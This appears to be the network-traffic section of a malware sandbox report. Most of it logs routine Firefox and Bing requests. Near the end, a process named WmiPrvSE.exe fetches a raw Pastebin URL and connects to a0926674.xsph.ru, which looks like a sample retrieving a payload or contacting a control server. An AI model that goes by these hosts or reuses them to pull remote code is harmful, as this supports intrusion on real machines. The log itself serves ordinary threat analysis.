content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/addons-manager-settings/changeset?_expected=1688747728721

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/addons-manager-settings/changeset?_expected=1688747728721 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/changeset?_expected=1707833207286&_since=%221661199949574%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/search-config/changeset?_expected=1707833207286&_since=%221661199949574%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1707833261849&_since=%221661199890666%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1707833261849&_since=%221661199890666%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/cert-revocations/changeset?_expected=1709719032061

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/security-state/collections/cert-revocations/changeset?_expected=1709719032061 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/onecrl/changeset?_expected=1709673810455&_since=%221658781354245%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/security-state/collections/onecrl/changeset?_expected=1709673810455&_since=%221658781354245%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/intermediates/changeset?_expected=1709323057665&_since=%221664891823141%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/security-state/collections/intermediates/changeset?_expected=1709323057665&_since=%221664891823141%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/ HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

54.218.225.239

shavar.prod.mozaws.net

IN A

44.239.242.57

shavar.prod.mozaws.net

IN A

44.237.149.213
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A
DNS

shavar.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.services.mozilla.com

IN A

Response

shavar.services.mozilla.com

IN CNAME

shavar.prod.mozaws.net

shavar.prod.mozaws.net

IN A

44.239.242.57

shavar.prod.mozaws.net

IN A

54.218.225.239

shavar.prod.mozaws.net

IN A

44.237.149.213
DNS

shavar.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.services.mozilla.com

IN A
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

239.225.218.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.225.218.54.in-addr.arpa

IN PTR

Response

239.225.218.54.in-addr.arpa

IN PTR

ec2-54-218-225-239 us-west-2compute amazonawscom
DNS

203.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.197.79.204.in-addr.arpa

IN PTR

Response

203.197.79.204.in-addr.arpa

IN PTR

a-0003a-msedgenet
DNS

aus5.mozilla.org

firefox.exe

Remote address:

8.8.8.8:53

Request

aus5.mozilla.org

IN A

Response

aus5.mozilla.org

IN CNAME

balrog-aus5.r53-2.services.mozilla.com

balrog-aus5.r53-2.services.mozilla.com

IN CNAME

prod.balrog.prod.cloudops.mozgcp.net

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

201.181.244.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
GET

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

firefox.exe

Remote address:

88.221.134.155:80

Request

GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Thu, 08 Feb 2024 02:25:35 GMT
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1707359134.18771
Content-Type: application/zip
X-Trans-Id: tx89667e5f00694599a075c-0065c59860dfw1
Cache-Control: public, max-age=40939
Expires: Wed, 06 Mar 2024 22:56:50 GMT
Date: Wed, 06 Mar 2024 11:34:31 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

155.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.134.221.88.in-addr.arpa

IN PTR

Response

155.134.221.88.in-addr.arpa

IN PTR

a88-221-134-155deploystaticakamaitechnologiescom
DNS

155.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.134.221.88.in-addr.arpa

IN PTR
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

216.58.212.238
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

216.58.212.238
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:80b::200e
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA
DNS

r1---sn-5hne6nzy.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r1---sn-5hne6nzy.gvt1.com

IN A

Response

r1---sn-5hne6nzy.gvt1.com

IN CNAME

r1.sn-5hne6nzy.gvt1.com

r1.sn-5hne6nzy.gvt1.com

IN A

172.217.132.166
DNS

r1.sn-5hne6nzy.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r1.sn-5hne6nzy.gvt1.com

IN A

Response

r1.sn-5hne6nzy.gvt1.com

IN A

172.217.132.166
DNS

238.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.212.58.216.in-addr.arpa

IN PTR

Response

238.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f141e100net

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f238�I

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f14�I
DNS

r1.sn-5hne6nzy.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r1.sn-5hne6nzy.gvt1.com

IN AAAA

Response

r1.sn-5hne6nzy.gvt1.com

IN AAAA

2a00:1450:400e:15::6
DNS

166.132.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.132.217.172.in-addr.arpa

IN PTR

Response

166.132.217.172.in-addr.arpa

IN PTR

ams15s49-in-f61e100net
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301480_1GLUO11W92SWCVMG3&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301480_1GLUO11W92SWCVMG3&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 489903
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 04E25B806A63405482AC6471847D85C1 Ref B: LON04EDGE1109 Ref C: 2024-03-06T11:34:45Z
date: Wed, 06 Mar 2024 11:34:44 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 407132
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 624EB060449F48329479C91A06278B7B Ref B: LON04EDGE1109 Ref C: 2024-03-06T11:34:45Z
date: Wed, 06 Mar 2024 11:34:44 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 405506
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 77F962F58E884E0BB66FDC487720120A Ref B: LON04EDGE1109 Ref C: 2024-03-06T11:34:45Z
date: Wed, 06 Mar 2024 11:34:44 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301047_1S8G2IIVJ6Z2H00N1&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301047_1S8G2IIVJ6Z2H00N1&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 556472
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7CD8D7BA8ABF46038CC58A32045A2544 Ref B: LON04EDGE1109 Ref C: 2024-03-06T11:34:45Z
date: Wed, 06 Mar 2024 11:34:44 GMT
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa

Remote address:

8.8.8.8:53

Request

c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa

IN PTR

Response
DNS

10.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.179.89.13.in-addr.arpa

IN PTR

Response
DNS

10.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.179.89.13.in-addr.arpa

IN PTR

204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

tls, http2

2.0kB
9.2kB
21
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204
142.250.187.202:443

46 B
40 B
1
1
104.20.67.143:443

https://pastebin.com/raw/p3tpsvu4

tls, http

WmiPrvSE.exe

854 B
4.0kB
8
8

HTTP Request

GET https://pastebin.com/raw/p3tpsvu4

HTTP Response

200
141.8.192.6:80

a0926674.xsph.ru

WmiPrvSE.exe

260 B
5
141.8.192.6:80

a0926674.xsph.ru

WmiPrvSE.exe

260 B
5
127.0.0.1:49920

firefox.exe
34.117.237.239:443

https://contile.services.mozilla.com/v1/tiles

tls, http2

firefox.exe

2.3kB
7.9kB
16
17

HTTP Request

GET https://contile.services.mozilla.com/v1/tiles
34.160.144.191:443

content-signature-2.cdn.mozilla.net

tls

firefox.exe

2.6kB
12.3kB
20
21
34.107.243.93:443

https://push.services.mozilla.com/

tls, http

firefox.exe

2.6kB
4.6kB
11
11

HTTP Request

GET https://push.services.mozilla.com/

HTTP Response

101
34.149.100.209:443

https://firefox.settings.services.mozilla.com/v1/

tls, http2

firefox.exe

43.6kB
1.4MB
675
1125

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expected=%221709719032061%22

HTTP Response

200

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/normandy-recipes-capabilities/changeset?_expected=1709683264026

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/language-dictionaries/changeset?_expected=1673270322227&_since=%221569410800356%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-recipes/changeset?_expected=1674595048726&_since=%221642005109349%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-rules/changeset?_expected=1679600032742&_since=%221659924409785%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/fxmonitor-breaches/changeset?_expected=1683667257606

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1701090424142&_since=%221606870304609%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1709536180469&_since=%221662648201700%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/sites-classification?_expected=1544035467383

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/anti-tracking-url-decoration?_expected=1564511755134

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/public-suffix-list/changeset?_expected=1575468539758

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-default-override-allowlist?_expected=1595254618540

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/pioneer-study-addons-v1/changeset?_expected=1607042143590

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/top-sites?_expected=1647020600359

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/doh-providers/changeset?_expected=1647549722107&_since=%221621943542621%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/doh-config/changeset?_expected=1651753780606&_since=%221621943462970%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/devtools-devices?_expected=1653469171354

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/websites-with-shared-credential-backends?_expected=1659924446436

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/addons-manager-settings/changeset?_expected=1688747728721

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/changeset?_expected=1707833207286&_since=%221661199949574%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1707833261849&_since=%221661199890666%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/cert-revocations/changeset?_expected=1709719032061

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/onecrl/changeset?_expected=1709673810455&_since=%221658781354245%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/intermediates/changeset?_expected=1709323057665&_since=%221664891823141%22

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/
54.218.225.239:443

shavar.services.mozilla.com

tls

firefox.exe

2.3kB
3.9kB
13
12
34.149.100.209:443

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

52 B
1
127.0.0.1:49926

firefox.exe
35.244.181.201:443

aus5.mozilla.org

tls

firefox.exe

1.5kB
5.4kB
13
13
34.149.100.209:443

firefox.settings.services.mozilla.com

tls

firefox.exe

1.1kB
4.0kB
12
11
34.160.144.191:443

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

